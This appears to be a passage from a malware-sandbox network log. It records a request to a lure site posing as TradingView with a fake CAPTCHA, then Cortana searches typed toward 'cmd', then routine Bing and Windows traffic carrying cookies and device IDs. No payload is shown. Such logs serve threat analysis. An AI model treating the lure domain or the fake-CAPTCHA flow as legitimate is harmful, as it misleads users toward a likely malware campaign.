        Source: global trafficHTTP traffic detected: GET /lander/tradingview/recaptcha-project-browser-transparent.png HTTP/1.1host: tradingviewprime.comuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36accept: */*sec-fetch-site: nonesec-fetch-mode: corssec-fetch-dest: emptysec-fetch-storage-access: activeaccept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
        Source: global trafficHTTP traffic detected: GET /manifest/threshold.appcache HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initorigin: https://www.bing.comaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=2f3777f7&IPMID=1741339061431&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Init HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=c&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=1&cvid=a279da2c5b244124869f757b83905435&ig=6cba30e9930b49e88e3d60ffd1f169de HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-se
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cm&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=2&cvid=a279da2c5b244124869f757b83905435&ig=a1891a94c2e8473fbfd7c148f4f4eab0 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-s
        Source: global trafficHTTP traffic detected: GET /AS/API/WindowsCortanaPane/V2/Suggestions?qry=cmd&setlang=en-CH&cc=CH&nohs=1&qfm=1&cp=3&cvid=a279da2c5b244124869f757b83905435&ig=980d29b949644590b7a121cb5baedd13 HTTP/1.1host: www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHx-agent-deviceid: 01000A4109009A83x-bm-cbt: 1741339061x-bm-clientfeatures: FontV22,LightAnswers,PreviewPaneAvailable,RevStorex-bm-dateformat: dd/MM/yyyyx-bm-devicedimensions: 784x640x-bm-devicedimensionslogical: 784x640x-bm-devicescale: 100x-bm-dtz: 60x-bm-market: CHx-bm-theme: 000000;0078d7x-bm-windowsflights: FX:119E26AD,FX:11C0E96C,FX:11C6E5C2,FX:11C7EB6A,FX:11C9408A,FX:11C940DB,FX:11CB9A9F,FX:11CB9AC1,FX:11CC111C,FX:11D5BFCD,FX:11DF5B12,FX:11DF5B75,FX:1240931B,FX:124117A5,FX:124B38D0,FX:127FC878,FX:1283FFE8,FX:12840617,FX:128979F9,FX:128EBD7E,FX:129135BB,FX:129E053F,FX:12A74DB5,FX:12AB734D,FX:12B8450E,FX:12BD6E73,FX:12C3331B,FX:12C7D66E,FX:12CDE644,FX:12D1574C,FX:12D281C4,FX:12E8312D,FX:12E85C75x-device-clientsession: DEC880747F854EE0B5C157C15870FBC2x-device-isoptin: falsex-device-machineid: {92C86F7C-DB2B-4F6A-95AD-98B4A2AE008A}x-device-ossku: 48x-device-touch: falsex-deviceid: 01000A4109009A83x-msedge-externalexp: d-thshld39,d-thshld42,d-thshld77,d-thshld78,d-thshldspcl40x-msedge-externalexptype: JointCoordx-positionertype: Desktopx-search-appid: Microsoft.Windows.Cortana_cw5n1h2txyewy!CortanaUIx-
        Source: global trafficHTTP traffic detected: GET /rb/16/jnc,nj/-M-8YWX0KlEtdAHVrkTvKQHOghs.js?bu=DicweooBkQGUAYcBgAGEAb8BwgEwtwHFAQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/FgBbpIj0thGWZOh_xFnM9i4O7ek.css?bu=C60L1QTiBf8L5grQCsMIaWlpaQ&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rb/19/cir3,ortl,cc,nc/tUCiVcVWZ-go7BLlq95YW6bKHZE.css?bu=B-IDUc4DvQJpae0D&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rb/3C/ortl,cc,nc/AptopUBu7_oVDubJxwvaIprW-lI.css?bu=A4gCjAKPAg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045if-modified-since: Wed, 11 Aug 2010 06:19:28 GMTcookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rb/6h/cir3,ortl,cc,nc/aLwn0Je_zO1JrjbMTOSuB-i7FUM.css?bu=Me4K5wr0CucK2gvnCuAL5wrrC-cK8gvnCvgL5wr-C-cKhAznCoYL5wqMC-cKgAvnCucK0QvnCpsL5wqhC-cKlQvnCucKsAuzC-cK5wrOC7wL5wrCC8UL5wqwDOcKigznCu4M&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rb/6h/ortl,cc,nc/NajusmjIqB4kdLn9FmVxeS4xi2o.css?bu=CdoM5wrnCucK5wrnCucK5wrnCg&or=w HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=ag5MNrHoG4V6seK&MD=DbLwmtSk HTTP/1.1host: slscr.update.microsoft.comaccept: */*user-agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33accept-encoding: identity
        Source: global trafficHTTP traffic detected: GET /rp/1EE7kbht1gjefYNX4DWLhQUytwE.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/BaYvmXn0q_Cf4wTJN2K9KdBrfbQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /conf/v2/asgw/fpconfig.min.json?monitorId=asgw HTTP/1.1host: fp.msedge.netorigin: https://www.bing.comreferer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept: */*accept-language: en-CHaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045
        Source: global trafficHTTP traffic detected: GET /rp/BjLNboZeAl9CUzulz_BWYtAs2KI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/Cj3ZU8zX_sufjrVdLFel-pJdQTs.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/Dn5Iypmm_cLV_tG2zZt_ZqSWy5o.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/DtBjRbkLzLMq5p7jmRn2HOq1lgI.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/GYWzw6Wnh2goOCGJn_s6AhjfSck.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; SRCHHPGUSR=IPMH=6c0e41a3&IPMID=1741339061939&SRCHLANG=de&LUT=1741339061036&HV=1749502084&HVE=CfDJ8GtUudZcSi1Enm88WwQKtCevo8vohI1Bw9-SxmS08AD2YcqM5zkWNA--GnmldKufpkKnvg5sG08xXolbhHdb8OsvyogYLLrgWYTP7n8NJmqsPSOzA1Qq5RSl942HRObuxHJd5iOtsy5Ud0YBOs7irKDW4pIQ2EpxQ6nLeDGD4WEV; CortanaAppUID=646BA1FF24F806DFED4199E1E0EFF63E; MUIDB=5047E5942BB2460EA35B53CCF78DDB3D
        Source: global trafficHTTP traffic detected: GET /rp/OUJ6ahKp8erGgr7fmZPGFt5iOeQ.js HTTP/1.1host: www.bing.comaccept: */*referer: https://www.bing.com/AS/API/WindowsCortanaPane/V2/Initaccept-encoding: identityuser-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Cortana 1.14.7.19041; 10.0.0.0.19045.2006) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19045cookie: MUID=5047E5942BB2460EA35B53CCF78DDB3D; _SS=SID=2B14B2771D29665F309CA7DF1CCC67E5&CBV=54277149&CPID=1741339061939&AC=1&CPH=6212fd11; _EDGE_S=SID=2B14B2771D29665F309CA7DF1CCC67E5&mkt=de-ch; SRCHUID=V=2&GUID=F82B2087A9384F33AD7BFBD2EB1DBFA2&dmnchg=1; SRCHD=AF=NOFORM; SRCHUSR=DOB=20250307&DS=1; 